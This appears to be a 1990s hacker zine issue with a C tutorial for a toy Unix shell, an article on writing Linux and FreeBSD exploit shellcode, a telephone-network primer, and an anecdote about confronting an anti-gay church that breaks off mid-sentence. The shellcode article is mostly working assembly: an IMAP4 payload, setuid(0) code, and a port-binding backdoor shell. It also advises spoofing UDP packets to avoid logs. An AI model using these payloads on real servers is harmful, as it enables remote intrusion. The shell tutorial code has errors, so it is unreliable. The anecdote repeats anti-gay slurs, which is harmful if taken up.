#include "b4b0shell.h"
#define MAX_BUF 500
void main(void) {
char input[MAX_BUF];
char **rargv;
while(1) {
fprintf(stderr, "%s\n" PROMPT_STRING);
fgets(input, MAX_BUF, stdin);
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if( fork() == 0) {
if(makeargv(input, BLANK_STRING, &rargv) > 0)
execvp(rargv[0], rargv);
}
wait(NULL)
}
}
exit(0);
}
--------------------------------EOF-----------------------------------------
Pretty simple huh? When you run it, go ahead and execute some basic
programs, like ls, grep, find etc. It works! Now, as I said before
this is a very raw basic shell, and does not support wiledcards like
'*' or '?'. Also, it doesnt support certain commands like 'cd' which
is available in any good shell. If by some chance the wait() isnt called?
Well, not too much of a problem, but if a user enters a command before
the previous one is executed, the commands will execute cocurrently
(read my article on cocurrency). Also, due to the fact that this
first version we wrote does not find errors on the execvp() call
it gets fucked up if you enter an invalid command. Your shell wont
get control back from the child process and the child process creates
its OWN shell. So you have to type 'quit' to get back to your parent
shell. Let's write a better version of this shell, that handles errors
with execvp(), and we will also replace the #define'd MAX_BUF with
MAX_CANON(located in b4b0shell.h). Because MAX_BUF is nonportable.
----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd) {
char **rargv;
if(makeargv(incmd, BLANK_STRING, &rargv) > 0) {
if(execvp(rargv[0], rargv) == -1) {
printf("Invalid command\n");
exit(1);
}
}
exit(1);
}
void main(void) {
char input[MAX_CANON];
pid_t child_pid;
while(1) {
fputs(PROMPT_STRING, stdout);
if (fgets(input, MAX_CANON, stdin) == NULL)
break;
if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
*(input + strlen(input - 1) = 0;
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if ((child_pid = fork()) == 0) {
execthecommand(input);
exit(1);
}
else if(child_pid > 0)
wait(NULL);
}
}
exit(0);
}
------------------------------EOF-----------------------------------------
We made several changes to version 2 of our shell. Notice we used fputs()
instead of fprintf() for the command line. fputs() prints a defined string
alot faster. Also, notice we did some more error checking in this version.
Also notice we now have the function execthecommand() to replace the
original execvp() and makeargv calls. Control will never come back
from the function execthecommand(), so you shouldnt be having a problem
when you enter invalid commands.
Unix deals with input/output through file descriptors. A program has to
open a file or a device before it can access it. It will then access
the file using a handle that is returned by open() syscall. With
the support of re-direction, you can do stuff like this.
b4b0$ cat < input.txt > output.txt
That command redirects its standard input to 'input.txt' and its output
to 'output.txt'.
The following, is a revised version of execthecommand() function that you
can use to support redirection. I basically made execthecommand() parse
*incmd, which might give possible redirection. It then calls redirect()
to perform the actual redirection, and makeargv() create the command
array. It then execs the command.
-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
char **rargv;
char *infile;
char *outfile;
if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
printf("Incorrect input redirection\n");
else if
(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
printf("Incorrect output redirection\n");
else if
(redirect(infile, outfile) == -1)
printf("redirection failed!@#$\n");
else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
if(execvp(rargv[0], rargv) == -1)
printf("Invalid command\n");
}
exit(1);
}
--------------------------EOF---------------------------------------------
Change the execthecommand() in bsh v2.0 to the one I modified for
redirection support.
Let's take a look at our final shell.
--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"
void execthecommand(char *incmd)
{
char **rargv;
char *infile;
char *outfile;
if(parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
printf("Incorrect input redirection\n");
else if
(parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
printf("Incorrect output redirection\n");
else if
(redirect(infile, outfile) == -1)
printf("redirection failed!@#$\n");
else if(makeargv(incmd, BLANK_STRING, &chargv) > 0) {
if(execvp(rargv[0], rargv) == -1)
printf("Invalid command\n");
}
exit(1);
}
void main(void) {
char input[MAX_CANON];
pid_t child_pid;
while(1) {
fputs(PROMPT_STRING, stdout);
if (fgets(input, MAX_CANON, stdin) == NULL)
break;
if(*(input + strlen(input) -1) == NEWLINE_SYMBOL)
*(input + strlen(input - 1) = 0;
if(strcmp(input, QUIT_STRING) == 0)
break;
else {
if ((child_pid = fork()) == 0) {
execthecommand(input);
exit(1);
}
else if(child_pid > 0)
wait(NULL);
}
}
exit(0);
}
------------------------------EOF--------------------------------------
Redirection is the last feature we are going to put in our shell.
Unfortunatley, I was busy as hell getting b4b0 7 together, and I
didn't have much time to add support for pipes, background processes,
jobcontrol(allows a user to move the foreground process group into
the background, and vice versa), or most of the other things that
a good shell features. This was merely for your learning and enjoyment.
Hope you gained something out of it. Feel free to look up the functions
in b4b0shell.h that we didnt use, and extend onto your shell.
Bye. HEH!@#$
ph1x@b4b0.org
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0!b4b0> The Art of Making Shell Code, by smiler <b4b0!b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Hopefully you are familiar with generic shell-spawning shellcode. If not
read Aleph's text "Smashing The Stack For Fun And Profit" before
reading further. This article will concentrate on the types of shellcode
needed to exploit daemons remotely. Generally it is much harder to exploit
remote daemons, because you do not have many ways of finding out the
configuration of the remote server. Often the shellcode has to be much
more complicated, which is what this article will focus on.
I will start by looking at the ancient IMAP4 exploit. This is a fairly
simple exploit. All you need to do is "hide" the /bin/sh" string in
shellcode (imapd converts all lowercase characters into uppercase).
None of the instructions in the generic shell-spawning shellcode contain
lower-case characters, so you all you need do is change the /bin/sh
string.
It is the same as normal shellcode, except there is a loop which adds
0x20 to each byte in the "/bin/sh" string. I put in lots of comments so
even beginners can understand it. Sorry to all those asm virtuosos :]
-----imap.S-------
.globl main
main:
jmp call
start:
popl %ebx /* get address of /bin/sh */
movl %ebx,%ecx /* copy the address to ecx */
addb $0x6,%cl /* ecx now points to the last character */
loop:
cmpl %ebx,%ecx
jl skip /* if (ecx<ebx) goto skip */
addb $0x20,(%ecx) /* adds 0x20 to the byte pointed to by %ecx */
decb %cl /* move the pointer down by one */
jmp loop
skip:
/* generic shell-spawning code */
movl %ebx,0x8(%ebx)
xorl %eax,%eax
movb %eax,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
xorl %eax,%eax
inc %al
int $0x80
call:
call start
.string "\x0f\x42\x49\x4e\x0f\x53\x48"
--------------
This was a very simple variation on the generic shellcode and can be
useful to mask characters that aren't allowed by the protocol the daemon
uses. But when coding remote, or even local, exploits you have to be
prepared to write code which is much more complex. This usually means
writing shellcode that involves different syscalls.
Useful syscalls are:
setuid(): To regain dropped root priviledges (e.g. wu-ftpd)
mkdir()/chdir()/chroot(): To drop back to root directory (e.g. wu-ftpd)
dup2(): To connect a tcp socket to the shell (e.g. BIND&rpc.mountd tcp-style)
open()/write(): To write to /etc/passwd (e.g. everything !)
socket(): To write connectionless shellcode, as explained later.
The actual syscall numbers can be found in <asm/unistd.h>
Most syscalls in linux x86 are done in the same way. The syscall number
is put into register %eax, and the arguments are put into %ebx,%ecx and
%edx respectively. In some cases, where there are more arguments than
registers it may be necessary to store the arguments in user memory and
store the address of the arguments in the register. Or, if an argument
is a string, you would have to store the string in user memory and pass
the address of string as the argument. As before, the syscall is called
by "int $0x80".
You can potentially use any syscall, but the ones mentioned above should
just about be the only ones you will ever need.
As an example heres a little shellcode snippet from my wu-ftpd exploit
that should execute setuid(0).
Note: you should always zero a register before using it.
---setuid.S----
.globl main
main:
xorl %ebx,%ebx /* zero the %ebx register, i.e. the 1st argument */
movl %ebx,%eax /* zero out the %eax register */
movb $0x17,%al /* set the syscall number */
int $0x80 /* call the interrupt handler */
---------------
Port-Binding Shellcode
When you are exploiting a daemon remotely with generic shellcode, it is
necessary to have an active TCP connection to pipe the shell stdin/out/err
over. This is applicable to all the remote linux exploits I've seen so
far, and is the preferred method.
But it is possible that a new vulnerability may be found, in a daemon
that only offers a UDP service (SNMP for example). Or it may only be
possible to access the daemon via UDP because the TCP ports are
firewalled etc. Current linux remote vulnerabilites are exploitable
via UDP - BIND as well as all rpc services run both UDP and TCP
services. Also, if you send the exploit via UDP it is trivial to spoof the
attacking udp packet so that you do not appear in any logs =)
To exploit daemons via UDP you could write shellcode to modify the
password file or to perform some other cunning task, but an interactive
shell is much more elite =] Clearly it is not possible to fit a UDP pipe
into shellcode, you still need a TCP connection. So my idea was to write
shellcode that behaved like a very rudimentary backdoor, it binds to a
port and executes a shell when it receives a connection.
I know for a fact that I wasn't the first one to write this type of
shellcode, but no one has officially published it so...here goes.
A basic bindshell program(without the style) looks like this:
int main()
{
char *name[2];
int fd,fd2,fromlen;
struct sockaddr_in serv;
fd=socket(AF_INET,SOCK_STREAM,0);
serv.sin_addr.s_addr=0;
serv.sin_port=1234;
serv.sin_family=AF_INET;
bind(fd,(struct sockaddr *)&serv,16);
listen(fd,1);
fromlen=16; /*(sizeof(struct sockaddr)*/
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
/* "connect" fd2 to stdin,stdout,stderr */
dup2(fd2,0);
dup2(fd2,1);
dup2(fd2,2);
name[0]="/bin/sh";
name[1]=NULL;
execve(name[0],name,NULL);
}
Obviously, this is going to require a lot more space than normal
shellcode, but it can be done in under 200 bytes and most buffers are
quite a bit larger than that.
There is a slight complication in writing this shellcode as socket
syscalls are done slightly differently than other syscalls, under linux.
Every socket call has the same syscall number, 0x66. To differentiate
between different socket calls, a subcode is put into the register %ebx.
These can be found in <linux/net.h>. The important ones being:
SYS_SOCKET 1
SYS_BIND 2
SYS_LISTEN 4
SYS_ACCEPT 5
We also need to know the values of the constants, and the exact
structure of sockaddr_in. Again these are in the linux include files.
AF_INET == 2
SOCK_STREAM == 1
struct sockaddr_in {
short int sin_family; /* 2 byte word, containing AF_INET */
unsigned short int sin_port; /* 2 byte word, containg the port in
network byte order */
struct in_addr sin_addr /* 4 byte long, should be zeroed */
unsigned char pad[8]; /* should be zero, but doesn't really matter */
};
Since there are only two registers left, the arguments must be placed
sequentially in user memory, and %ecx must contain the address of the
first. Hence we have to store the arguments at the end of the shellcode.
The first 12 bytes will contain the 3 long arguments, the next 16 will
contain the sockaddr_in structure and the final 4 will contain fromlen
for the accept() call. Finally the result from each syscall is held in
%eax.
So, without further ado, here is the portshell warez...
Again I've over-commented everything.
----portshell.S----
.globl main
main:
/* I had to put in a "bounce" in the middle of the code as the shellcode
* was too big. If I had made it jmp the entire shellcode, the instruction
* would have contained a null byte, so if anyone has a shorter version,
* please send me it.
*/
jmp bounce
start:
popl %esi
/* socket(2,1,0) */
xorl %eax,%eax
movl %eax,0x8(%esi) /* 3rd arg == 0 */
movl %eax,0xc(%esi) /* zero out sock.sin_family&sock.sin_port */
movl %eax,0x10(%esi) /* zero out sock.sin_addr */
incb %al
movl %eax,%ebx /* socket() subcode == 1 */
movl %eax,0x4(%esi) /* 2nd arg == 1 */
incb %al
movl %eax,(%esi) /* 1st arg == 2 */
movw %eax,0xc(%esi) /* sock.sin_family == 2 */
leal (%esi),%ecx /* load the address of the arguments into %ecx */
movb $0x66,%al /* set socket syscall number */
int $0x80
/* bind(fd,&sock,0x10) */
incb %bl /* bind() subcode == 2 */
movb %al,(%esi) /* 1st arg == fd (result from socket()) */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes to point to sockaddr struct */
movb $0x10,0x8(%esi) /* 3rd arg == 0x10 */
movb $0x23,0xe(%esi) /* set sin.port */
movb $0x66,%al /* no need to set %ecx, it is already set */
int $0x80
/* listen(fd,2) */
movl %ebx,0x4(%esi) /* bind() subcode==2, move this to the 2nd arg */
incb %bl /* no need to set 1st arg, it is the same as bind() */
incb %bl /* listen() subcode == 4 */
movb $0x66,%al /* again, %ecx is already set */
int $0x80
/* fd2=accept(fd,&sock,&fromlen) */
incb %bl /* accept() subcode == 5 */
movl %ecx,0x4(%esi) /* copy address of arguments into 2nd arg */
addb $0xc,0x4(%esi) /* increase it by 12 bytes */
movl %ecx,0x4(%esi) /* copy address of arguments into 3rd arg */
addb $0x1c,0x4(%esi) /* increase it by 12+16 bytes */
movb $0x66,%al
int $0x80
/* KLUDGE */
jmp skippy
bounce:
jmp call
skippy:
/* dup2(fd2,0) dup2(fd2,1) dup2(fd2,2) */
movb %al,%bl /* move fd2 to 1st arg */
xorl %ecx,%ecx /* 2nd arg is 0 */
movb $0x3f,%al /* set dup2() syscall number */
int $0x80
incb %cl /* 2nd arg is 1 */
movb $0x3f,%al
int $0x80
incb %cl /* 2nd arg is 2 */
movb $0x3f,%al
int $0x80
/* execve("/bin/sh",["/bin/sh"],NULL) */
movl %esi,%ebx
addb $0x20,%ebx /* %ebx now points to "/bin/sh" */
xorl %eax,%eax
movl %ebx,0x8(%ebx)
movb %al,0x7(%ebx)
movl %eax,0xc(%ebx)
movb $0xb,%al
leal 0x8(%ebx),%ecx
leal 0xc(%ebx),%edx
int $0x80
/* exit(0) */
xorl %eax,%eax
movl %eax,%ebx
incb %al
int $0x80
call:
call start
.ascii "abcdabcdabcd""abcdefghabcdefgh""abcd""/bin/sh"
-----------------------------------------------------
Once you have sent the exploit, you only need to connect to port 8960, and
you have an interactive shell.
----------------[ FreeBSD shellcode
Just in case all of that was all old hat to you, I'll take a little
foray into the world of BSD x86 shellcode. FreeBSD shellcode is in most
ways completely different. Primarily because syscalls are done by pushing
arguments onto the stack and using a far call. The syscall number
still goes in the %eax register however. OpenBSD is much the same but
it uses an interrupt for syscalls.
The main complication in writing shellcode for FreeBSD is in the far
call (instruction lcall 7,0) which contains 5 null bytes. Obviously
you would need to write some basic self-modifying shellcode. Since this is
going to be used in every syscall you make, its best to put this into a
mini-function and call it whenever necessary. I wrote a little template
for this, it's easy enough to make it execute a shell or bind to a port.
Just incase you're wondering the syscall for execve is 0x3b.
----fbsd.S----
.globl main
main:
jmp call
start:
/* Modify the ascii string so it becomes lcall 7,0 */
popl %esi
xorl %ebx,%ebx
movl %ebx,0x1(%esi) /* zeroed long word */
movb %bl,0x6(%esi) /* zeroed byte */
movl %esi,%ebx
addb $0x8,%bl /* ebx points to binsh */
jmp blah /* start the code */
call:
call start
syscall:
.ascii "\x9a\x01\x01\x01\x01\x07\x01" /* hidden lcall 7,0 */
ret
binsh:
.ascii "/bin/sh...."
blah:
/* put shellcode here */
call syscall
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
<b4b0!b4b0> The Telephone System/Network Part 1, by pabell <b4b0!b4b0>
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
THE TELEPHONE SYSTEM OR NETWORK
This paper was written mainly because of the lack of real information
kicking around on and off the net about phone systems and networks.
This is part one, of a two-part primer on phone systems. This is a
very introductory paper. I don't go into great detail, but cover the
basics and a first look at phone networks and systems.
If you really haven't been exposed to the telephony industry, this
paper, may be ominous. For the purpose of this paper I have broken
the telephone network into three basic components.
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
In this paper we will look at each of the three sections.
Section three the INSIDE PLANT FACILITIES will be covered in detail
throughout it. The CENTRAL SWITCHING MACHINE and the OUTSIDE PLANT
FACILITIES sections of the telephone network will be explained briefly
in general terms. Most of the parts of the telephone system or network
will already be familiar to you even without realizing it. You have a
phone of some description in your home or office, which is part of
the INSIDE PLANT FACILITIES section of the telephone network.
The INSIDE PLANT FACILITIES consists of all the cable, hardware,
telephone sets or equipment in the building or between buildings on
the same piece of property. The part of the network, which connects
buildings of various shapes and descriptions together, is called THE
OUTSIDE PLANT FACILITIES. Poles and associated wires are the only
type of outside plant distribution system in use today.
The remaining part you may not know about, or at least think you don't
know about, is the Central Switching Machine. The basic telephone circuit
is Two Wire Circuit, which connects every telephone set, through the
Outside Plant Facilities to a Central Switch. This two-wire circuit is
usually referred to as a "pair". One wire of the pair is referred to
as the TIP and the other wire is the RING.
THE CENTRAL SWITCHING MACHINE
The CENTRAL SWITCHING MACHINE is similar to the hub of a wheel where all
the individual two wire circuits or spokes are connected. This may sound
pretty complicated, but it really isn't. The central switch monitors
your telephone circuit and gives you a dial tone when you lift the
telephone set off the cradle. Taking a telephone handset off the
cradle is referred to as going "off-hook". Off-hook is a very common
phrase, and you will hear it in later parts of this paper.
When you dial, the Central Switch registers the digits dialed,
and identifies the circuit of the party you are trying to reach. The
Central Switch then connects your two-wire circuit to the party you dialed.
The two telephone sets, which are connected together by the Central Switch,
are referred to as the "calling" and "called" parties. The Central Switch
the sends a ringing voltage out to the called party, which rings the set
bells to identify an incoming call.
When the called party goes off-hook, the Central Switch recognizes the
off-hook condition, and stops sending the ringing voltage, the two
parties then converse. When the calling party dials a number of a
telephone circuit which is already in use, or "busy", the Central
Switch recognizes the busy condition, and returns a busy tone to
the calling party.
So, as you can see, the Central Switch isn't really unfamiliar to you.
You have interacted with, and experienced many of the operations it
performs. There are many types of Central Switching Machines in use
throughout the telephone industry today. Each switch has it's advantages,
and features, however all systems provide the basic functions which were
briefly described.
To review, the main parts of the Telephone Network I have described so
far are:
1. THE CENTRAL SWITCHING MACHINE
2. THE OUTSIDE PLANT FACILITIES
3. THE INSIDE PLANT FACILITIES
Let's backtrack briefly to the Outside Plant Facilities section of the
network. Obviously, it would be too difficult to take each seperate
two-wire circuit, individually back to the Central Switch. Consequently,
numerous two wire circuits or pairs from a common area are bound together
in a common covering, or sheath. These groups of pairs enclosed by a common
sheath are referred to as cable. The actual number of pairs in a cable
or the size of cable can vary from one pair, to hundreds of pairs dependent
upon how many circuits the cable must service. As was mentioned previously,
all the cables servicing locations leave the Central Switch in different
directions according to the route, which will be the most cost effective,
and can effectively, service people in the area. The cables, which leave
the Central Switch, are very large, but as the cable goes along it is
continually decreasing in size, as smaller cables are dropped off at
locations where they are needed. The smaller cables branch out from the
main cables, and these cables again branch out to smaller cables until
every building and place is reached.
There are three basic types of outside plant facilities in use today, which connect the Central Switch, ultimately to your phone.
1. AERIAL CABLE
2. UNDERGROUND CABLE
3. FIBER OPTIC CABLE
Let's briefly look at each of the types of Outside Plant Facilities.
Aerial Cable
As the name aerial cable would indicate, the cable, and terminals are
supported above the ground on poles. The Aerial Cable distribution
system is probably the one you are most familiar with, since it was the
first system utilized across North America. The poles and wire are still
visible throughout this country today, and in many cases, is still the
most cost-effective method, where underground cabling is physically
impossible.
The diagram would be typical of a single line residential building
application of an Aerial Outside Plant System. You may see the term
"terminal" in the diagram. Terminals are simply access points placed at
convenient locations, on or between poles, along the cable route to permit
connections to selected pairs in the cable. For example, a cable
consisting of 100 pairs might have a terminal mounted on the pole to
allow a technician access to pairs 1-25. The next terminal would allow
access to pairs 24-40, and so on, until all the pairs have been used.
In this manner, the pair assigned to each building, at the Central Switch,
can be accessed at the closest terminal to that particular building.
The individual buildings aerial "drop wire" is then connected to the
pair in that terminal.
Underground Cable
The underground cable distribution system is very similar in design to the
aerial cable system. I consider underground cable to be both, DIRECT
BURIED CABLE and CABLE PLACED IN UNDERGROUND CONDUIT SYSTEMS.
As the title Direct Buried would indicate, the cable is placed into
the ground, with no protection other than the inherent protection
provided by the cable composition. Underground Conduit Systems
for cable, are used to provide an out of sight cable system and to
provide a means of adding to the existing cable as service demands
increase. Underground Conduit Systems also provide protection for
the cables since the cables are inside a pipe, which shields the cable.
The Underground Cable Distribution System is configured similarly to
the aerial cable, in that, cables leave a central point and continually
branch out to smaller cables until all the buildings etc. have been
accommodated.
The Underground System is connected to buildings in basically two ways.
PEDESTALS and ENCAPSULATION. Pedestals are simply terminals or access
points where building cabling can be connected to the cable from the
Central Switching Machine. There are many types, sizes, and shapes of
pedestals in use today.
The following diagram is a simplified depiction of the underground cable
(drop wire) from a building premise, which has been buried, to a pedestal
for connection.
Encapsulation is when the buildings drop wire is permanently spliced into
the underground distribution system. This system is preferred in
situations where the visible pedestals are not appropriate, or possible.
Fiber Optic Transmission Systems
In the aerial and underground cable distribution systems looked at
earlier, a pair of copper wires is used to carry the electrical signals
generated by the transmitting buildings phone, to the switching machine,
and then ultimately, to the receivers phone. The mouthpiece (transmitter)
of the telephone converts the acoustic voice message into corresponding
electrical signals. The electrical signals are passed onto the receiver's
earpiece (receiver) where they are converted back to the original
acoustic voice message.
In certain cases now, it is becoming uneconomical to provide a pair of
wires from every customer phone to the central switch. Transmitting speech
and information via glass fibers instead of the conventional copper wire
methods previously described is becoming increasingly popular in high
traffic areas. The term "Fiber Optics" or "FOTS" is becoming more and
more prevalent in the communication industry. "FOTS" is the short term
for Fiber Optics Transmission System.
The development of FOTS technology has been increasing dramatically in
recent years. The transmitting buildings phone still generates the same
electrical signals, but the signals are used to turn a light source on and
off. The light travels down the glass fibers where it is received and
converted back to electrical impulses, which are connected to the
receiving customers to wire copper pair.
To get a perspective of the comparison of a pair of copper wires to a pair
of glass fibers, consider the number of independent connections, which are
possible on each type of system.
* A pair of copper wires will provide two way communications for one
conversation.
* A pair of glass fibers can provide up to 8000 independent connections.
The demands for more and more facilities to transmit and receive
information is becoming increasingly rapid. The cost and limitations of
traditional means of linking areas together, is becoming more apparent.
The normal cable distribution systems in use throughout the telephone
industry employs combinations of underground, aerial, and FOTS
distribution systems, to provide the most cost efficient, and effective
means of providing service.
There is your basic introduction to the telephone network or system.
As my series of phone networks goes on I will go into greater detail
and explain some of its more complex issues and attributes.
Pabell
pabell@comtech.ab.ca
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
How I literally got kicked out of the Eastern Baptist Church, by schemerz
-x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x-
Disclaimer: Incidents included are all fictionious in nature due to the
shady recollection process after smoking a little bit too much hash. These
incidents were funny, at least as I remember it. These accounts are
somewhat factual, somewhat not, so I decided just to change the names and
make it safe in case I get anything horribly wrong.
Eastern Baptist Church is located in Topuka, the capital of the state
Kansas. It's not a really big church, but they get in the news alot.
Most of the time they leave their tact at home and picket funerals and
concerts, most recently the funeral of Math ew Sheppard. (I think they
are too chicken to picket the rob zomebie and korn concert in KC last
night, kick ass concert btw, but that's another article... :) They are
also responsible for web sites such as www.goddetestsfags.com. So they
are really a fun bunch. Rush Limbough would have been proud.
Reverend Fred Felps heads the crowd, who was a lawyer in a previous life,
until one of his sons got out of the closet. Fred Felps then runs to the
nearest Warmart to purchase a really bad white robe and calls himself a
preacher. After being thrown out o f the Southern Baptist Church because
of his faggot hating ways, he started his own church, the Eastern Baptist
Church, which basically runs out of his own house along with 20-30 family
members and close friends. They get supported by a lot of white powe r
parties too. Although not all of the family is predominantly prejudgice,
I have had the pleasure of meeting his grandson, Ben Felps, who happens to
be a graduate student doing computer science at University of Kansas. Ben
admins most of his granddaddy 's sites, including of course yours truly.
Enough with the background. I have to explain why I had the urge of
seeing one of these sermons of Fred, if not fucking it up and causing some
serious mayhem:
Almost 3 years ago I arrived in Kansas fresh off the boat, as they would
say afer having a less than stellar high school career somewhere in South
East Asia. Shortly after arriving into the university and being shipped
off to this smelly little dorm room , I was introduced to Sam my new
roomate. He drove me around, showing me stuff and I got to know him very
well. We were just kicking it one weekend in september and started
watching the tele, when channel 6 was doing a special of a concert held at
a loc al community college. Turns out this composer was dying of AIDS,
and someone was holding a concert in his name for being the talent as he
is. (I can't remember this dood's name, but I remember listening to some
of his stuff on the local university radio now. Truly a talent.) Caught
out of the corner of the camera there were these doods holding up signs with
slogans like "Anal Sex=Aids=Death," "Gay=Death of Ethics=Death of America,"
and of course, "God detests fags!". I was thoroughly bewildered at the
sight of such signs, and proceeded to bug Sam about it. Shit like this
at home just does not fly. It's not like asians have a strong tolerance
of homosexuals or racial diversity, but they keep it to themselves and
have the politeness to withhold their opinion at times of mourning, such
as a concert displaying ones work as one dies of aids. Being the fuckwit
18 year old that I was, I suggested to Sam that we would head over and see
one of their sermons and check out their reasoning, because neither of us
can make any logical sense out of Fred's websites. So we called the
church up, asked if it was an open sermon coming up. We stated that we
weren't gonna cause trouble, and putting on my fakeist british accent,
asked if we could attend. We were of co urse declined the opportunity,
since it was a close church.
Being the dumb motherfucker sam can be sometimes, we decided to crash the
party instead. (He's getting married to the least sensible woman on this
planet in a month, so WATCH OUT FOR DA KIDS)
So we hoped into his girlfriends car (btw we chatted this woman up no more
than one week before, and now three years latter sam is fucking marrying
the woman... good god... time has past QUICKLY... oh and she lent him
the car... Megan is so fucking co ol, prolly cause Sam is such a fucking
pimp), and drove to Topuka. We arrived at the church shortly before the
sermon begun, and walked in, saying we are looking for Ben. Ben came out
shortly, trying to cover his blood soaked ass, saying that his grandd ad
was holding a sermon. We talked abit, commenting a little about the
upside down american flag hanging outside the church. He said he would
attend to us shortly after the sermon. I put on the largest puppy dog
eyes I could muster, and asked *very* po litely if I can attend the
sermon. Since he was a ta in one of my computer science lab classes, he
was sure I wasn't going to pull any shit.
We got in, sat on a seat. The living room was packed, and Sam was kinda
chickening out a little... "Maybe we shon't be here dood..." Little did
I know he was one of the most articulate argurers I was ever gonna meet :)
So the sermon went, the usual ch urch shit, yahdayahdayahda... the hymes,
the prayers and all that... until about 45 minutes latter Sam woke me
from deep slumber when Fred started preaching the evils of homosexuality.
People started asking questions as he spoke, and he answered quite
logically. The man was a lawyer I thought, most of them, like my dad,
have a knack of conveying one side of reasoning and made it all
encompassing. So I held up my hand, to which I was asked to speak.
"Reverend Felps, I am new here, in this church and in this country. I don't
quite understand why you seem to direct all your problems at one social group
who a) pay more taxes per capita then most other minorites, b) are probably
more educated as well ?
How can any group contributing to the government and society in such a
way be considered harmful ?"
He muttered something ridiculous like telling me to get a haircut, which
was when Sam (he's got hair down to his ass... I learned never ever to
talk any shit about long hair around him) stood up and started his
rhetoric :)...
"Mr Felps, I would like to know why you are so proliferic about your
projections on to gay people. It is quite entertaining, humorous even,
that you would chose to broadcast your inner id feelings towards
homosexuals on national television. "
Most people got the joke, and gave us the evilest look they could muster.
I must say most people would have backdowned and shut up at this point,
but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he
did not know what Sam meant.
Sam : "Mr Felps, would you like to answer my friends question as to why
you are targeting one of the more successful groups of minorites of this
country ?"
Felps : "I happen to think their lifestyle is a harmful influence to our
youth in this country. I also happen to percieve that this country is
being overran by faggots. Is there no more decency in this country ?"
(applause by his crowd)
"Mr Felps, as I recall correctly, the american society is firmly
capitalist, meaning that each individual's success is based upon one's
wealth. how would the lifestyle of a homosexual, one of success, good
education and wealth be questionable to the yout h? "
Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN
based. It is because of non-believers such as these homosexuals, that the
youth today stem from the faith. That, is why I am opposed to them."
Me : "But was it not in the new Testament itself that states that we
should love our neighbours ?"
Felps : "Ummmmm... Are you familiar with the book of Sodom ?"
Sam : "Yes I am, and I am familiar with this line of arguement. You would
state that the book of sodom states quite clearly that male-male sexual
activites are forbidden and the only male-female copulation is deemed
allowable by god. You would also stat e that the bible FIRMLY states that
sex is a sacred act of god, and people should not abuse this power. You
will also lead into the argument right here that AIDS and other sexually
transmitted diseases was the repricusion of these acts."
Felps : "You read my mind son. How would you chose to refute these
claims. I am of course a man binded by faith, so please keep any
arguements of the bible's validity to yourself. "
Sam : "Okay... Homosexuality has been documented long since roman times.
How come aids were to come around now?"
Felps : "There are other sexual transmitted diseases that god has
dispensed in his fury upon this planet. Unfortunately the devil has made
the faggot strong in his ways, and they have not been disuaded."
Me : "How about this ? It is nearly medically impossible for lesbians to
contract aids. If god indeed try to make AIDS as a means of disuading
homosexuality, why are a) more hetrosexuals affected ? b) why did he
leave half the faggots off the list ? "
Felps : "God is not fair, he chose to punish the whole of humanity for the
crimes of the faggots. I have taken up the task of god to disuade all of
humanity against the ways of faggots. Lesbians are evil too."
One of us : "You still have not answered the questions we posed, could you
please answer them now ? "
Felps : "I have answered them son. God has other diseases to weaken his
enemy. Aids is only one piece in his arsenal. Gonoerrha, syphillis, etc
etc all attack sexually indecent men and women in some way or another."
One of us : "Alright fair enough, how about this... If a person who is
not sexually promiscous, then it is very unlikely that he or she gets
infected with anything correct ? Is it possible that your god wants to
disuade his people away from promiscious sex ? Has he not made a
distinction between acts of love and acts of passion before ?"
Felps :"God has made it very clear that sexual acts outside of wedlock are
forbidden. "
Me :"Mr Felps, where does it exactly in the bible say that wedlock has to
between a man and a woman ?"
Felps : (stammers some unintelligible... me and sam exchange evil
grinning looks...)
Me : "As a matter of fact, where in the bible does it define the man and
the woman entity, biologically and psychologically ? If this premise is
not made, then all your arguements against homosexuality is up to
question."
Someone in the crowd : "How is that ?"
Sam : "Well it is quite easy to see that a gay couple can be enacting both
the male and female parts of the relationship. With legislation allowing
homosexuals to marry in Hawaii it is perfectly ethical for gays to be in
bounds of christianity and still copulate. No ?"
Someone in the crowd : (something like you fags or faggot loving
liberals... something dumb like that... think it was Ben. )
Someone else in the crowd : (Leave if you don't like what we have to say,
We don't like you anyways.)
Sam : "We are merely discussing the rhetoric in the bible, I personally
made no attacks towards the validity of the good book, neither did my
friend here. "
Some bitch in the crowd : "Shut up you people are full of it as it is!"
Me : "We were merely discussing with the *beloved* reverend the various
interpreations of the bible over a fine comb."
We were asked to leave anyways :) In fact, we didn't leave quite yet
until Sam got his answers from his questions. Sorely to say we were
rather discouraged with our journey towards the interpretations of the
bible. I personally ditched the cross and became a taoist instead.
Oh well... Fred was beaten up in the middle of Kansas City one day when
